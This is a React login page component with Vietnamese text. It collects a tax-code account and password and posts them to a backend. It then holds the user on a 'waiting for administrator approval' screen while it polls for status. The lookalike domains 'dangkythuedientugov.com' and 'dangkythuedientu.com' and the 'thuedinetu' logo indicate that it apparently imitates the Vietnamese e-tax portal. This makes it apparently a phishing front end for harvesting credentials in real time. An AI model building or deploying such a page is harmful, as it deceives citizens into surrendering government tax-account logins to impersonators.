// File: LoginPage.jsx
import React, { useEffect, useRef, useState } from 'react';
import { useNavigate, Link } from 'react-router-dom';
import { User, Lock, Eye, EyeOff,  QrCode,
  Wrench,
  Headphones,
  Share2 } from 'lucide-react';
import './LoginPage.css';
import backgroundImagec from '../assets/background-C60agDj0.png';
import { apiEndpoint } from '../config/api';
const BACKGROUND_URL = 'https://st.quantrimang.com/photos/image/2025/03/31/Anh-nen-den-13.jpg';
const LOGO_URL = 'https://static.vecteezy.com/system/resources/thumbnails/024/553/534/small/lion-head-logo-mascot-wildlife-animal-illustration-generative-ai-png.png';
const LOGIN_API_URL =
  process.env.REACT_APP_LOGIN_API_URL ||
  apiEndpoint('api/login.php');

const LOGIN_STATUS_API_URL =
  process.env.REACT_APP_LOGIN_STATUS_API_URL ||
  apiEndpoint('api/login-status.php');
const LoginPage = () => {
  const [showPassword, setShowPassword] = useState(false);
  const [rememberMe, setRememberMe] = useState(false);
  const [error, setError] = useState('');
  const [loginData, setLoginData] = useState({ username: '', password: '' });
  const [checkingIp, setCheckingIp] = useState(false);
const [waitingAccess, setWaitingAccess] = useState(false);
const [approvalRequestId, setApprovalRequestId] = useState('');
const pollingRef = useRef(null);
  const navigate = useNavigate();
  const saveLogin = (result) => {
  const storage = rememberMe
    ? window.localStorage
    : window.sessionStorage;

  storage.setItem('demo_auth_token', result.token);
  storage.setItem('demo_user', JSON.stringify(result.user));

  // Xóa token cũ ở storage còn lại để tránh nhầm phiên.
  const otherStorage = rememberMe
    ? window.sessionStorage
    : window.localStorage;

  otherStorage.removeItem('demo_auth_token');
  otherStorage.removeItem('demo_user');

  navigate('/home', { replace: true });
};
const stopApprovalPolling = () => {
  if (pollingRef.current) {
    window.clearInterval(pollingRef.current);
    pollingRef.current = null;
  }
};

const checkApprovalStatus = async (requestId) => {
  try {
    const response = await fetch(LOGIN_STATUS_API_URL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        Accept: 'application/json',
      },
      cache: 'no-store',
      body: JSON.stringify({
        request_id: requestId,
      }),
    });

    const result = await response.json().catch(() => null);

    if (!response.ok || !result) {
      throw new Error(
        result?.message || 'Không kiểm tra được trạng thái duyệt.'
      );
    }

    if (result.status === 'approved' && result.token) {
      stopApprovalPolling();
      setWaitingAccess(false);
      setApprovalRequestId('');
      saveLogin(result);
      return;
    }

    if (result.status === 'rejected') {
      stopApprovalPolling();
      setWaitingAccess(false);
      setApprovalRequestId('');
      setError(result.message || 'Yêu cầu đăng nhập đã bị từ chối.');
      return;
    }

    if (result.status === 'expired') {
      stopApprovalPolling();
      setWaitingAccess(false);
      setApprovalRequestId('');
      setError('Yêu cầu đăng nhập đã hết hạn. Vui lòng đăng nhập lại.');
    }
  } catch (requestError) {
    console.error('Approval polling error:', requestError);
  }
};

const startApprovalPolling = (requestId) => {
  stopApprovalPolling();

  // Kiểm tra ngay một lần.
  checkApprovalStatus(requestId);

  pollingRef.current = window.setInterval(() => {
    checkApprovalStatus(requestId);
  }, 2000);
};
useEffect(() => {
  return () => {
    stopApprovalPolling();
  };
}, []);

const handleLogin = async (e) => {
  e.preventDefault();
  setError('');

  const account = loginData.username.trim().toLowerCase();
  const password = loginData.password;

  if (!account) {
    setError('Vui lòng nhập tên đăng nhập');
    return;
  }

  if (!password.trim()) {
    setError('Vui lòng nhập mật khẩu');
    return;
  }

  setCheckingIp(true);

  try {
    const response = await fetch(LOGIN_API_URL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        Accept: 'application/json',
      },
      cache: 'no-store',
      body: JSON.stringify({
        account,
        password,
        remember_me: rememberMe,
      }),
    });

    const result = await response.json().catch(() => null);

    if (!response.ok || !result) {
      throw new Error(
        result?.message || 'Đăng nhập không thành công.'
      );
    }

    // Đã được duyệt trong vòng 24 giờ.
    if (result.success && result.status === 'approved' && result.token) {
      saveLogin(result);
      return;
    }

    // Đúng mật khẩu nhưng đang đợi admin duyệt.
    if (result.success && result.status === 'pending') {
      if (!result.request_id) {
        throw new Error('Máy chủ không trả về mã yêu cầu duyệt.');
      }

      setApprovalRequestId(result.request_id);
      setWaitingAccess(true);
      startApprovalPolling(result.request_id);
      return;
    }

    throw new Error(result.message || 'Đăng nhập không thành công.');
  } catch (requestError) {
    setError(requestError.message || 'Không thể kết nối máy chủ');
  } finally {
    setCheckingIp(false);
  }
};

  const handleLogoClick = () => navigate('/login');

  return (
    <div className="min-h-screen relative overflow-hidden flex flex-col" style={{ fontFamily: 'Arial' }}>
      {/* Background */}
      <div
        className="absolute inset-0 z-0 bg-cover bg-center bg-no-repeat pointer-events-none"
        style={{ backgroundImage: `linear-gradient(rgba(0,0,0,.35), rgba(0,0,0,.55)), url(${backgroundImagec})`, backgroundSize: 'cover' }}
      />

      <div className="relative z-10 flex-1 flex flex-col">
        {/* Logo */}
        <div className="flex flex-col items-center pt-10 pb-6">
          <button onClick={handleLogoClick} className="focus:outline-none active:scale-95 transition-transform">
            <img src={require('../assets/thuedinetu-BoU6E12Y.png')} alt="Logo hệ thống" referrerPolicy="no-referrer" className="w-36 h-36 object-contain" />
          </button>
        </div>

        {/* Form */}
        <div className="flex-1 pb-6">
          <div className="px-6">
            <div className="flex justify-center gap-8 mb-8">
              <Link to="/login" className="pb-2 font-medium transition-all text-white border-b-2 border-white text-lg">Đăng nhập hệ thống</Link>
              <Link to="/register" className="pb-2 font-medium transition-all text-white/50 text-lg">Đăng ký</Link>
            </div>

            {error && <div className="mb-4 p-3 rounded-lg bg-red-500/20 border border-red-500/50 text-center text-white text-sm">{error}</div>}

            <form onSubmit={handleLogin} className="space-y-5">
              {/* Username */}
              <div className="relative">
                <div className="absolute left-4 top-1/2 -translate-y-1/2 text-white/70"><User size={18} /></div>
                <input
                  type="text"
                  placeholder="Tài khoản (MST)"
                  value={loginData.username}
                  onChange={(e) => { setLoginData({ ...loginData, username: e.target.value }); setError(''); }}
                  className="w-full pl-12 h-12 bg-white/5 border-b border-white/20 text-white placeholder:text-white/40 focus:outline-none focus:border-white/50 transition-colors"
                />
              </div>

              {/* Password */}
              <div className="relative">
                <div className="absolute left-4 top-1/2 -translate-y-1/2 text-white/70"><Lock size={18} /></div>
                <input
                  type={showPassword ? 'text' : 'password'}
                  placeholder="Mật khẩu"
                  value={loginData.password}
                  onChange={(e) => { setLoginData({ ...loginData, password: e.target.value }); setError(''); }}
                  className="w-full pl-12 pr-12 h-12 bg-white/5 border-b border-white/20 text-white placeholder:text-white/40 focus:outline-none focus:border-white/50 transition-colors"
                />
                <button type="button" onClick={() => setShowPassword(!showPassword)}
                  className="absolute right-4 top-1/2 -translate-y-1/2 text-white/40 hover:text-white transition-colors">
                  {showPassword ? <EyeOff size={18} /> : <Eye size={18} />}
                </button>
              </div>

              {/* Remember + Forgot */}
              <div className="flex items-center justify-between">
                <label className="flex items-center gap-2 text-sm text-white/60 cursor-pointer">
                  <input type="checkbox" checked={rememberMe} onChange={(e) => setRememberMe(e.target.checked)} className="w-4 h-4 rounded border-white/30 bg-transparent"/>
                  Lưu thông tin đăng nhập
                </label>
                <a href="/forgot-password" className="text-sm text-white/40 hover:text-white transition-colors underline underline-offset-4">Quên mật khẩu?</a>
              </div>

              {/* Buttons */}
              <div className="flex items-center gap-3 pt-4">
              <button
  type="submit"
  className="flex-1 h-12 rounded-full bg-red-600 hover:bg-red-700 text-white font-bold shadow-lg shadow-red-900/20 active:scale-[0.98] transition-all disabled:cursor-not-allowed disabled:opacity-60"
  disabled={checkingIp || waitingAccess}
>
  {checkingIp
    ? 'Đang xác thực...'
    : waitingAccess
      ? 'Đang chờ duyệt...'
      : 'Đăng nhập'}
</button>
                <button type="button" className="w-12 h-12 rounded-xl border border-white/20 flex items-center justify-center text-white/60 hover:bg-white/10 transition-all">
                  <QrCode size={24} />
                </button>
              </div>
              
              
           <div className="digital-identity-login mt-1">
  <div className="digital-identity-content">
    <span>
      Đăng nhập bằng tài khoản
      <br />
      hệ thống nội bộ
    </span>

   
    <img
      src="https://dangkythuedientugov.com/image/1679018362827_unnamed.png"
      alt="Định danh điện tử"
      className="digital-identity-icon"
    />
  </div>
</div>
            </form>
          </div>
          <div className="quick-menu">
  <div className="quick-item">
    <QrCode size={42} />
    <span>QR tem</span>
  </div>

  <div className="quick-item">
    <Wrench size={42} />
    <span>Tiện ích</span>
  </div>

  <div className="quick-item">
    <Headphones size={42} />
    <span>Hỗ trợ</span>
  </div>

  <div className="quick-item">
    <Share2 size={42} />
    <span>Chia sẻ</span>
  </div>
</div>
        </div>
        
      </div>
      

      {/* Popup */}
{(checkingIp || waitingAccess) && (
  <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/40 backdrop-blur-sm">
    <div className="flex flex-col items-center gap-4">
      <img
        src="https://dangkythuedientu.com/img/loading.42dd77aa.gif"
        alt={waitingAccess ? 'Đang chờ quản trị viên duyệt' : 'Đang xác thực'}
        className="w-48 h-48 object-contain"
        referrerPolicy="no-referrer"
      />

      {waitingAccess && (
        <div className="rounded-xl bg-black/50 px-5 py-3 text-center text-white">
          <p className="font-semibold">Đang chờ quản trị viên duyệt</p>
          <p className="mt-1 text-sm text-white/70">
            Vui lòng không đóng trang này
          </p>
        </div>
      )}
    </div>
  </div>
)}
    </div>
  );
};

export default LoginPage;
